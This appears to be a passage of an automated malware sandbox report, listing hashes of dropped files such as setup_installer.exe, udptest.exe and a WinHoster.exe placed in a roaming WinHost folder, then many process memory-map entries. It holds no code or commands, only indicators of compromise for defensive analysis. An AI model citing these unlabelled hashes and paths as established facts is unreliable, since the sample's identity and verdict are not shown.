SHA512e685dfa20e17c6a9f33c6ec9c6ceaaaf8354c9a518bb4ffc2980f276f0b61bf7758d757cfc18fd8d252ae282e8da476bdb91edef7b9ae1fb0a142b120404d72e
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
ac05ac0ba5b0d85ecd9e462158a3db58
SHA14ead955437b3c8c3b1e64b6d3af76b0edbe9623d
SHA25689818524bd880f26d06220ed9bee6da0c79948135d246a5508e3fbe17f16cbea
SHA512e685dfa20e17c6a9f33c6ec9c6ceaaaf8354c9a518bb4ffc2980f276f0b61bf7758d757cfc18fd8d252ae282e8da476bdb91edef7b9ae1fb0a142b120404d72e
-
C:\Users\Admin\AppData\Local\Temp\udptest.exeMD5
f1cd08ca29a2add76e5b0464750c645b
SHA1929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA2560cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA5124ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687
-
C:\Users\Admin\AppData\Local\Temp\udptest.exeMD5
f1cd08ca29a2add76e5b0464750c645b
SHA1929de2a20f5d82b333f95213c955e90e2e0fc66c
SHA2560cb33bdee818c06cd3e34b8b3a2a0f4120bd91527ef87406f4086bd2841ef5ec
SHA5124ae6b8729b1ff8061839c0ba8f5a13ce50e5746fab4ed4fadd2e2aab1a9ad31198ca31d8748d64f7011a361e253b29ca2b4112ad201c670fb38f95b5068c6687
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exeMD5
d4b87bd4f5956b855a27f0bcb1dde5f4
SHA1e3fa38a058b9d7b820fa89ad901417c9918778eb
SHA256da45516c0c39189c7eea11160bed9cc69cea2623d43ed9093bf2b478b0d25807
SHA512a132313c57d45e616bd8c211db8244d901b84371e51324ba96a6729eee10dcefd8466b27196b91ad5490c29ccbe090b056b22d1df116330cc7395c7b0a85ef87
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exeMD5
d4b87bd4f5956b855a27f0bcb1dde5f4
SHA1e3fa38a058b9d7b820fa89ad901417c9918778eb
SHA256da45516c0c39189c7eea11160bed9cc69cea2623d43ed9093bf2b478b0d25807
SHA512a132313c57d45e616bd8c211db8244d901b84371e51324ba96a6729eee10dcefd8466b27196b91ad5490c29ccbe090b056b22d1df116330cc7395c7b0a85ef87
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
\Users\Admin\AppData\Local\Temp\is-07TI3.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
memory/340-413-0x000001A14E380000-0x000001A14E3F4000-memory.dmpFilesize
464KB
-
memory/504-159-0x0000000000000000-mapping.dmp
-
memory/672-184-0x0000000000000000-mapping.dmp
-
memory/672-192-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/688-206-0x0000000001790000-0x00000000018DA000-memory.dmpFilesize
1.3MB
-
memory/688-204-0x0000000000400000-0x0000000001788000-memory.dmpFilesize
19.5MB
-
memory/688-161-0x0000000000000000-mapping.dmp
-
memory/732-408-0x000000007F710000-0x000000007F711000-memory.dmpFilesize
4KB
-
memory/732-163-0x0000000000000000-mapping.dmp
-
memory/732-195-0x00000000048A0000-0x00000000048A1000-memory.dmpFilesize
4KB
-
memory/732-234-0x0000000006F00000-0x0000000006F01000-memory.dmpFilesize
4KB
-
memory/732-194-0x00000000071F0000-0x00000000071F1000-memory.dmpFilesize
4KB
-
memory/732-266-0x0000000007970000-0x0000000007971000-memory.dmpFilesize
4KB
-
memory/732-193-0x00000000048A2000-0x00000000048A3000-memory.dmpFilesize
4KB
-
memory/732-317-0x0000000007920000-0x0000000007921000-memory.dmpFilesize
4KB
-
memory/732-254-0x0000000007110000-0x0000000007111000-memory.dmpFilesize
4KB
-
memory/732-453-0x00000000048A3000-0x00000000048A4000-memory.dmpFilesize
4KB
-
memory/732-249-0x00000000070A0000-0x00000000070A1000-memory.dmpFilesize
4KB
-
memory/732-190-0x00000000048F0000-0x00000000048F1000-memory.dmpFilesize
4KB
-
memory/908-380-0x0000000000000000-mapping.dmp
-
memory/1004-114-0x0000000000000000-mapping.dmp
-
memory/1044-339-0x0000000000000000-mapping.dmp
-
memory/1044-374-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/1064-443-0x000001E1F2B70000-0x000001E1F2BE4000-memory.dmpFilesize
464KB
-
memory/1104-401-0x00007FF7C8764060-mapping.dmp
-
memory/1104-410-0x000001C0C0E70000-0x000001C0C0EE4000-memory.dmpFilesize
464KB
-
memory/1108-441-0x000001FE3EC70000-0x000001FE3ECE4000-memory.dmpFilesize
464KB
-
memory/1224-452-0x00000220C3B70000-0x00000220C3BE4000-memory.dmpFilesize
464KB
-
memory/1252-133-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1252-135-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1252-138-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1252-117-0x0000000000000000-mapping.dmp
-
memory/1252-139-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1252-137-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1252-136-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1252-134-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1440-437-0x0000029F58ED0000-0x0000029F58F44000-memory.dmpFilesize
464KB
-
memory/1832-405-0x0000000004DB0000-0x0000000004E0F000-memory.dmpFilesize
380KB
-
memory/1832-389-0x0000000000000000-mapping.dmp
-
memory/1832-402-0x0000000004C66000-0x0000000004D67000-memory.dmpFilesize
1.0MB
-
memory/1912-223-0x0000000000400000-0x00000000017F2000-memory.dmpFilesize
19.9MB
-
memory/1912-207-0x0000000003420000-0x00000000034F1000-memory.dmpFilesize
836KB
-
memory/1912-167-0x0000000000000000-mapping.dmp
-
memory/1992-442-0x000001B4ED2B0000-0x000001B4ED324000-memory.dmpFilesize
464KB
-
memory/2184-202-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/2184-197-0x0000000000000000-mapping.dmp
-
memory/2232-376-0x0000000005740000-0x0000000005741000-memory.dmpFilesize
4KB
-
memory/2232-363-0x0000000000000000-mapping.dmp
-
memory/2308-255-0x000000001AD30000-0x000000001AD32000-memory.dmpFilesize
8KB
-
memory/2308-225-0x0000000000520000-0x000000000053E000-memory.dmpFilesize
120KB
-
memory/2308-211-0x0000000000000000-mapping.dmp
-
memory/2308-214-0x00000000000F0000-0x00000000000F1000-memory.dmpFilesize
4KB
-
memory/2388-387-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2388-377-0x0000000000000000-mapping.dmp
-
memory/2464-439-0x000001EFDC930000-0x000001EFDC9A4000-memory.dmpFilesize
464KB
-
memory/2540-140-0x0000000000000000-mapping.dmp
-
memory/2544-436-0x000001E8ED360000-0x000001E8ED3D4000-memory.dmpFilesize
464KB
-
memory/2560-141-0x0000000000000000-mapping.dmp
-
memory/2672-236-0x00000000007B0000-0x00000000007B1000-memory.dmpFilesize
4KB
-
memory/2672-232-0x0000000000000000-mapping.dmp
-
memory/2708-143-0x0000000000000000-mapping.dmp
-
memory/2732-145-0x0000000000000000-mapping.dmp
-
memory/2740-415-0x000002812EA10000-0x000002812EA5D000-memory.dmpFilesize
308KB
-
memory/2740-398-0x000002812EB30000-0x000002812EBA4000-memory.dmpFilesize
464KB
-
memory/3032-160-0x0000000000000000-mapping.dmp
-
memory/3052-297-0x0000000000750000-0x0000000000765000-memory.dmpFilesize
84KB
-
memory/3060-147-0x0000000000000000-mapping.dmp
-
memory/3168-188-0x00000000021D0000-0x00000000021D2000-memory.dmpFilesize
8KB
-
memory/3168-177-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/3168-170-0x0000000000000000-mapping.dmp
-
memory/3196-169-0x0000000000000000-mapping.dmp
-
memory/3588-216-0x0000000000000000-mapping.dmp
-
memory/3588-220-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/3628-153-0x0000000000000000-mapping.dmp
-
memory/3728-171-0x0000000000000000-mapping.dmp
-
memory/3760-259-0x00000000030D0000-0x00000000030D1000-memory.dmpFilesize
4KB
-
memory/3760-272-0x000000001BC60000-0x000000001BC62000-memory.dmpFilesize
8KB
-
memory/3760-258-0x00000000030B0000-0x00000000030CB000-memory.dmpFilesize
108KB
-
memory/3760-247-0x0000000000FD0000-0x0000000000FD1000-memory.dmpFilesize
4KB
-
memory/3760-256-0x00000000030A0000-0x00000000030A1000-memory.dmpFilesize
4KB
-
memory/3760-240-0x0000000000000000-mapping.dmp
-
memory/3764-149-0x0000000000000000-mapping.dmp
-
memory/3768-196-0x0000000000A30000-0x0000000000A4A000-memory.dmpFilesize
104KB
-
memory/3768-176-0x0000000000000000-mapping.dmp
-
memory/3768-198-0x0000000000C50000-0x0000000000C51000-memory.dmpFilesize
4KB
-
memory/3768-191-0x0000000000A20000-0x0000000000A21000-memory.dmpFilesize
4KB
-
memory/3768-183-0x0000000000500000-0x0000000000501000-memory.dmpFilesize
4KB
-
memory/3768-200-0x000000001B2D0000-0x000000001B2D2000-memory.dmpFilesize
8KB
-
memory/3800-155-0x0000000000000000-mapping.dmp
-
memory/3884-203-0x0000000002B70000-0x0000000002C1E000-memory.dmpFilesize
696KB
-
memory/3884-205-0x0000000000400000-0x0000000002B6B000-memory.dmpFilesize
39.4MB
-
memory/3884-182-0x0000000000000000-mapping.dmp
-
memory/4000-151-0x0000000000000000-mapping.dmp
-
memory/4060-157-0x0000000000000000-mapping.dmp
-
memory/4064-239-0x00000000011E0000-0x00000000011E4000-memory.dmpFilesize
16KB
-
memory/4064-226-0x0000000000000000-mapping.dmp
-
memory/4064-253-0x00000000077E0000-0x00000000077E1000-memory.dmpFilesize
4KB
-
memory/4064-230-0x0000000000A20000-0x0000000000A21000-memory.dmpFilesize
4KB
-
memory/4092-224-0x00000000073A2000-0x00000000073A3000-memory.dmpFilesize
4KB
-
memory/4092-219-0x0000000000400000-0x0000000002B6E000-memory.dmpFilesize
39.4MB
-
memory/4092-165-0x0000000000000000-mapping.dmp
-
memory/4092-264-0x0000000004BD0000-0x0000000004BD1000-memory.dmpFilesize
4KB
-
memory/4092-306-0x0000000007340000-0x0000000007341000-memory.dmpFilesize
4KB
-
memory/4092-209-0x0000000004980000-0x000000000499F000-memory.dmpFilesize
124KB
-
memory/4092-210-0x00000000073B0000-0x00000000073B1000-memory.dmpFilesize
4KB
-
memory/4092-238-0x0000000004B30000-0x0000000004B4E000-memory.dmpFilesize
120KB
-
memory/4092-293-0x0000000004D20000-0x0000000004D21000-memory.dmpFilesize
4KB
-
memory/4092-292-0x00000000073A4000-0x00000000073A6000-memory.dmpFilesize
8KB
-
memory/4092-270-0x0000000007230000-0x0000000007231000-memory.dmpFilesize
4KB
-
memory/4092-208-0x0000000002B70000-0x0000000002CBA000-memory.dmpFilesize
1.3MB
-
memory/4092-221-0x00000000073A0000-0x00000000073A1000-memory.dmpFilesize
4KB
-
memory/4092-241-0x00000000078B0000-0x00000000078B1000-memory.dmpFilesize
4KB
-
memory/4092-227-0x00000000073A3000-0x00000000073A4000-memory.dmpFilesize
4KB
-
memory/4100-250-0x00000000009F0000-0x00000000009F1000-memory.dmpFilesize
4KB
-
memory/4100-245-0x0000000000000000-mapping.dmp
-
memory/4100-257-0x00000000029C0000-0x00000000029C2000-memory.dmpFilesize
8KB
-
memory/4160-315-0x0000000002B60000-0x0000000002C0E000-memory.dmpFilesize
696KB
-
memory/4160-260-0x0000000000000000-mapping.dmp
-
memory/4160-324-0x0000000000400000-0x0000000002B5D000-memory.dmpFilesize
39.4MB
-
memory/4168-597-0x0000000000000000-mapping.dmp
-
memory/4276-303-0x0000000002450000-0x0000000002452000-memory.dmpFilesize
8KB
-
memory/4276-263-0x0000000000000000-mapping.dmp
-
memory/4284-332-0x0000000004F50000-0x0000000004F51000-memory.dmpFilesize
4KB
-
memory/4284-328-0x0000000000000000-mapping.dmp
-
memory/4288-354-0x0000000007143000-0x0000000007144000-memory.dmpFilesize
4KB
-
memory/4288-331-0x0000000002B70000-0x0000000002C1E000-memory.dmpFilesize
696KB
-
memory/4288-351-0x0000000007142000-0x0000000007143000-memory.dmpFilesize
4KB
-
memory/4288-357-0x0000000007144000-0x0000000007146000-memory.dmpFilesize
8KB
-
memory/4288-265-0x0000000000000000-mapping.dmp
-
memory/4288-346-0x0000000000400000-0x0000000002B6D000-memory.dmpFilesize
39.4MB
-
memory/4288-349-0x0000000007140000-0x0000000007141000-memory.dmpFilesize
4KB
-
memory/4312-294-0x0000000004940000-0x0000000004941000-memory.dmpFilesize
4KB
-
memory/4312-288-0x0000000004B70000-0x0000000004B71000-memory.dmpFilesize
4KB
-
memory/4312-275-0x00000000000B0000-0x00000000000B1000-memory.dmpFilesize
4KB
-
memory/4312-300-0x0000000004920000-0x0000000004938000-memory.dmpFilesize
96KB
-
memory/4312-271-0x0000000000000000-mapping.dmp
-
memory/4312-309-0x0000000004A10000-0x0000000004A13000-memory.dmpFilesize
12KB
-
memory/4372-386-0x0000000000000000-mapping.dmp
-
memory/4400-395-0x0000000005180000-0x0000000005786000-memory.dmpFilesize
6.0MB
-
memory/4400-372-0x000000000041C5E2-mapping.dmp
-
memory/4484-277-0x0000000000000000-mapping.dmp
-
memory/4484-299-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4508-312-0x00000000077C0000-0x00000000077C1000-memory.dmpFilesize
4KB
-
memory/4508-278-0x0000000000000000-mapping.dmp
-
memory/4508-313-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/4628-311-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4628-289-0x0000000000000000-mapping.dmp
-
memory/4636-291-0x0000000000000000-mapping.dmp
-
memory/4644-301-0x00000000000D0000-0x00000000000D1000-memory.dmpFilesize
4KB
-
memory/4644-307-0x0000000004760000-0x000000000477B000-memory.dmpFilesize
108KB
-
memory/4644-318-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/4644-290-0x0000000000000000-mapping.dmp
-
memory/4692-335-0x0000000000000000-mapping.dmp
-
memory/4752-336-0x0000000000000000-mapping.dmp
-
memory/4752-359-0x000000001BA90000-0x000000001BA92000-memory.dmpFilesize
8KB
-
memory/4772-383-0x0000000000000000-mapping.dmp
-
memory/4772-399-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4880-325-0x0000000005760000-0x0000000005D66000-memory.dmpFilesize
6.0MB
-
memory/4880-314-0x0000000000400000-0x0000000000401000-memory.dmpFilesize
4KB
-
memory/4880-305-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4880-308-0x000000000041C5DE-mapping.dmp
-
memory/4960-310-0x0000000000000000-mapping.dmp
-
memory/5116-347-0x0000000000000000-mapping.dmp
-
memory/5116-375-0x00000000048D0000-0x0000000004DCE000-memory.dmpFilesize
5.0MB
-
memory/5156-603-0x0000000000000000-mapping.dmp
-
memory/5248-599-0x0000000000000000-mapping.dmp
-
memory/5316-571-0x000000000098D20B-mapping.dmp
-
memory/5400-548-0x0000000000000000-mapping.dmp
-
memory/5608-473-0x0000000000000000-mapping.dmp
-
memory/5864-505-0x0000000000000000-mapping.dmp
-
memory/5952-516-0x0000000000000000-mapping.dmp
-
memory/6112-596-0x0000000000000000-mapping.dmp